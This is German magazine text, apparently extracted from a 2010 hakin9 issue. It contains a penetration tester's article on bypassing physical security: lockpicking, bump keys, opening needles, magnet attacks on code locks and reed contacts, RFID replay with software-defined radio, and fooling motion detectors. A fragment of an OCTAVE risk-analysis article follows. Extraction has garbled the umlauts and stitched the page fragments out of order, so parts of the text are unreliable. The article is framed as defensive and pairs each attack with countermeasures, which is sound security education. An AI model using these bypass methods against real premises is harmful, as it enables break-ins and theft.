Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
